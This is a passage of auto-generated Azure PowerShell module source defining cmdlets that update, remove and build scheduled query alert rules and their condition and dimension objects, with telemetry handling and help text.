[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) begin { try { $outBuffer = $null if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) { $PSBoundParameters['OutBuffer'] = 1 } $parameterSet = $PSCmdlet.ParameterSetName if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) { [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString() } $preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId if ($preTelemetryId -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString() [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet) } else { $internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets if ($internalCalledCmdlets -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name } else { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal' } $mapping = @{ Delete = 'Az.ScheduledQueryRule.private\Remove-AzScheduledQueryRule_Delete'; DeleteViaIdentity = 'Az.ScheduledQueryRule.private\Remove-AzScheduledQueryRule_DeleteViaIdentity'; } if (('Delete') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) { $testPlayback = $false $PSBoundParameters['HttpPipelinePrepend'] | Foreach-Object { if ($_) { $testPlayback = $testPlayback -or ('Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.PipelineMock' -eq $_.Target.GetType().FullName -and 'Playback' -eq $_.Target.Mode) } } if ($testPlayback) { $PSBoundParameters['SubscriptionId'] = . (Join-Path $PSScriptRoot '..' 'utils' 'Get-SubscriptionIdTestSafe.ps1') } else { $PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id } } $cmdInfo = Get-Command -Name $mapping[$parameterSet] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){ [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name) } $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters} $steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } process { try { $steppablePipeline.Process($_) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } finally { $backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId $backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } } end { try { $steppablePipeline.End() [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets if ($preTelemetryId -eq '') { [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } } <# .Synopsis Update a scheduled query rule. .Description Update a scheduled query rule. .Example $subscriptionId=(Get-AzContext).Subscription.Id Update-AzScheduledQueryRule -Name test-rule -ResourceGroupName test-group -Scope "/subscriptions/$subscriptionId/resourceGroups/test-group/providers/Microsoft.Compute/virtualMachines/test-vm" -ActionGroupResourceId "/subscriptions/$subscriptionId/resourceGroups/test-group/providers/microsoft.insights/actionGroups/test-action-group" -AutoMitigate:$false .Inputs Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity .Outputs Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource .Notes COMPLEX PARAMETER PROPERTIES To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables. CRITERIONALLOF <ICondition[]>: A list of conditions to evaluate against the specified scopes [Dimension <IDimension[]>]: List of Dimensions conditions Name <String>: Name of the dimension Operator <DimensionOperator>: Operator for dimension values Value <String[]>: List of dimension values [FailingPeriodMinFailingPeriodsToAlert <Int64?>]: The number of violations to trigger an alert. Should be smaller or equal to numberOfEvaluationPeriods. Default value is 1 [FailingPeriodNumberOfEvaluationPeriod <Int64?>]: The number of aggregated lookback points. The lookback time window is calculated based on the aggregation granularity (windowSize) and the selected number of aggregated points. Default value is 1 [MetricMeasureColumn <String>]: The column containing the metric measure number. Relevant only for rules of the kind LogAlert. [MetricName <String>]: The name of the metric to be sent. Relevant and required only for rules of the kind LogToMetric. [Operator <ConditionOperator?>]: The criteria operator. Relevant and required only for rules of the kind LogAlert. [Query <String>]: Log query alert [ResourceIdColumn <String>]: The column containing the resource id. The content of the column must be a uri formatted as resource id. Relevant only for rules of the kind LogAlert. [Threshold <Double?>]: the criteria threshold value that activates the alert. Relevant and required only for rules of the kind LogAlert. [TimeAggregation <TimeAggregation?>]: Aggregation type. Relevant and required only for rules of the kind LogAlert. INPUTOBJECT <IScheduledQueryRuleIdentity>: Identity Parameter [Id <String>]: Resource identity path [ResourceGroupName <String>]: The name of the resource group. The name is case insensitive. [RuleName <String>]: The name of the rule. [SubscriptionId <String>]: The ID of the target subscription. .Link https://learn.microsoft.com/powershell/module/az.monitor/update-azscheduledqueryrule #> function Update-AzScheduledQueryRule { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource])] [CmdletBinding(DefaultParameterSetName='UpdateExpanded', PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')] param( [Parameter(ParameterSetName='UpdateExpanded', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [System.String] # The name of the rule. ${Name}, [Parameter(ParameterSetName='UpdateExpanded', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [System.String] # The name of the resource group. # The name is case insensitive. ${ResourceGroupName}, [Parameter(ParameterSetName='UpdateExpanded')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String] # The ID of the target subscription. ${SubscriptionId}, [Parameter(ParameterSetName='UpdateViaIdentityExpanded', Mandatory, ValueFromPipeline)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity] # Identity Parameter # To construct, see NOTES section for INPUTOBJECT properties and create a hash table. ${InputObject}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IActionsCustomProperties]))] [System.Collections.Hashtable] # The properties of an alert payload. ${ActionCustomProperty}, [Parameter()] [AllowEmptyCollection()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String[]] # Action Group resource Ids to invoke when the alert fires. ${ActionGroupResourceId}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Management.Automation.SwitchParameter] # The flag that indicates whether the alert should be automatically resolved or not. # The default is true. # Relevant only for rules of the kind LogAlert. ${AutoMitigate}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Management.Automation.SwitchParameter] # The flag which indicates whether this scheduled query rule should be stored in the customer's storage. # The default is false. # Relevant only for rules of the kind LogAlert. ${CheckWorkspaceAlertsStorageConfigured}, [Parameter()] [AllowEmptyCollection()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.ICondition[]] # A list of conditions to evaluate against the specified scopes # To construct, see NOTES section for CRITERIONALLOF properties and create a hash table. ${CriterionAllOf}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String] # The description of the scheduled query rule. ${Description}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String] # The display name of the alert rule ${DisplayName}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Management.Automation.SwitchParameter] # The flag which indicates whether this scheduled query rule is enabled. # Value should be true or false ${Enabled}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.TimeSpan] # How often the scheduled query rule is evaluated represented in ISO 8601 duration format. # Relevant and required only for rules of the kind LogAlert. ${EvaluationFrequency}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.TimeSpan] # Mute actions for the chosen period of time (in ISO 8601 duration format) after the alert is fired. # Relevant only for rules of the kind LogAlert. ${MuteActionsDuration}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.TimeSpan] # If specified then overrides the query time range (default is WindowSize*NumberOfEvaluationPeriods). # Relevant only for rules of the kind LogAlert. ${OverrideQueryTimeRange}, [Parameter()] [AllowEmptyCollection()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String[]] # The list of resource id's that this scheduled query rule is scoped to. ${Scope}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Int64] # Severity of the alert. # Should be an integer between [0-4]. # Value of 0 is severest. # Relevant and required only for rules of the kind LogAlert. ${Severity}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Management.Automation.SwitchParameter] # The flag which indicates whether the provided query should be validated or not. # The default is false. # Relevant only for rules of the kind LogAlert. ${SkipQueryValidation}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResourcePatchTags]))] [System.Collections.Hashtable] # Resource tags ${Tag}, [Parameter()] [AllowEmptyCollection()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String[]] # List of resource type of the target resource(s) on which the alert is created/updated. # For example if the scope is a resource group and targetResourceTypes is Microsoft.Compute/virtualMachines, then a different alert will be fired for each virtual machine in the resource group which meet the alert criteria. # Relevant only for rules of the kind LogAlert ${TargetResourceType}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.TimeSpan] # The period of time (in ISO 8601 duration format) on which the Alert query will be executed (bin size). # Relevant and required only for rules of the kind LogAlert. ${WindowSize}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Azure')] [System.Management.Automation.PSObject] # The DefaultProfile parameter is not functional. # Use the SubscriptionId parameter when available if executing the cmdlet against a different subscription. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) begin { try { $outBuffer = $null if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) { $PSBoundParameters['OutBuffer'] = 1 } $parameterSet = $PSCmdlet.ParameterSetName if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) { [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString() } $preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId if ($preTelemetryId -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString() [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet) } else { $internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets if ($internalCalledCmdlets -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name } else { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal' } $mapping = @{ UpdateExpanded = 'Az.ScheduledQueryRule.private\Update-AzScheduledQueryRule_UpdateExpanded'; UpdateViaIdentityExpanded = 'Az.ScheduledQueryRule.private\Update-AzScheduledQueryRule_UpdateViaIdentityExpanded'; } if (('UpdateExpanded') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) { $testPlayback = $false $PSBoundParameters['HttpPipelinePrepend'] | Foreach-Object { if ($_) { $testPlayback = $testPlayback -or ('Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.PipelineMock' -eq $_.Target.GetType().FullName -and 'Playback' -eq $_.Target.Mode) } } if ($testPlayback) { $PSBoundParameters['SubscriptionId'] = . (Join-Path $PSScriptRoot '..' 'utils' 'Get-SubscriptionIdTestSafe.ps1') } else { $PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id } } $cmdInfo = Get-Command -Name $mapping[$parameterSet] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){ [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name) } $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters} $steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } process { try { $steppablePipeline.Process($_) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } finally { $backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId $backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } } end { try { $steppablePipeline.End() [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets if ($preTelemetryId -eq '') { [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } } <# .Synopsis Create an in-memory object for Condition. .Description Create an in-memory object for Condition. .Example $dimension = New-AzScheduledQueryRuleDimensionObject -Name Computer -Operator Include -Value * New-AzScheduledQueryRuleConditionObject -Dimension $dimension -Query "Perf | where ObjectName == `"Processor`" and CounterName == `"% Processor Time`" | summarize AggregatedValue = avg(CounterValue) by bin(TimeGenerated, 5m), Computer" -TimeAggregation "Average" -MetricMeasureColumn "AggregatedValue" -Operator "GreaterThan" -Threshold "70" -FailingPeriodNumberOfEvaluationPeriod 1 -FailingPeriodMinFailingPeriodsToAlert 1 .Outputs Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.Condition .Notes COMPLEX PARAMETER PROPERTIES To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables. DIMENSION <IDimension[]>: List of Dimensions conditions. Name <String>: Name of the dimension Operator <DimensionOperator>: Operator for dimension values Value <String[]>: List of dimension values .Link https://learn.microsoft.com/powershell/module/Az.Monitor/new-AzScheduledQueryRuleConditionObject #> function New-AzScheduledQueryRuleConditionObject { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.Condition])] [CmdletBinding(PositionalBinding=$false)] param( [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IDimension[]] # List of Dimensions conditions. # To construct, see NOTES section for DIMENSION properties and create a hash table. ${Dimension}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Int64] # The number of violations to trigger an alert. # Should be smaller or equal to numberOfEvaluationPeriods. # Default value is 1. ${FailingPeriodMinFailingPeriodsToAlert}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Int64] # The number of aggregated lookback points. # The lookback time window is calculated based on the aggregation granularity (windowSize) and the selected number of aggregated points. # Default value is 1. ${FailingPeriodNumberOfEvaluationPeriod}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String] # The column containing the metric measure number. # Relevant only for rules of the kind LogAlert. ${MetricMeasureColumn}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String] # The name of the metric to be sent. # Relevant and required only for rules of the kind LogToMetric. ${MetricName}, [Parameter()] [ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.ConditionOperator])] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.ConditionOperator] # The criteria operator. # Relevant and required only for rules of the kind LogAlert. ${Operator}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String] # Log query alert. ${Query}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String] # The column containing the resource id. # The content of the column must be a uri formatted as resource id. # Relevant only for rules of the kind LogAlert. ${ResourceIdColumn}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Double] # the criteria threshold value that activates the alert. # Relevant and required only for rules of the kind LogAlert. ${Threshold}, [Parameter()] [ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.TimeAggregation])] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.TimeAggregation] # Aggregation type. # Relevant and required only for rules of the kind LogAlert. ${TimeAggregation} ) begin { try { $outBuffer = $null if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) { $PSBoundParameters['OutBuffer'] = 1 } $parameterSet = $PSCmdlet.ParameterSetName if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) { [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString() } $preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId if ($preTelemetryId -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString() [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet) } else { $internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets if ($internalCalledCmdlets -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name } else { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal' } $mapping = @{ __AllParameterSets = 'Az.ScheduledQueryRule.custom\New-AzScheduledQueryRuleConditionObject'; } $cmdInfo = Get-Command -Name $mapping[$parameterSet] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){ [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name) } $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters} $steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } process { try { $steppablePipeline.Process($_) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } finally { $backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId $backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } } end { try { $steppablePipeline.End() [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets if ($preTelemetryId -eq '') { [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } } <# .Synopsis Create an in-memory object for Dimension. .Description Create an in-memory object for Dimension. .Example New-AzScheduledQueryRuleDimensionObject -Name Computer -Operator Include -Value * .Outputs Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.Dimension .Link https://learn.microsoft.com/powershell/module/Az.Monitor/new-AzScheduledQueryRuleDimensionObject #> function New-AzScheduledQueryRuleDimensionObject { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.Dimension])] [CmdletBinding(PositionalBinding=$false)] param( [Parameter(Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String] # Name of the dimension. ${Name}, [Parameter(Mandatory)] [ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.DimensionOperator])] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.DimensionOperator] # Operator for dimension values. ${Operator}, [Parameter(Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String[]] # List of dimension values. ${Value} ) begin { try { $outBuffer = $null if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) { $PSBoundParameters['OutBuffer'] = 1 } $parameterSet = $PSCmdlet.ParameterSetName if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) { [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString() } $preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId if ($preTelemetryId -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString() 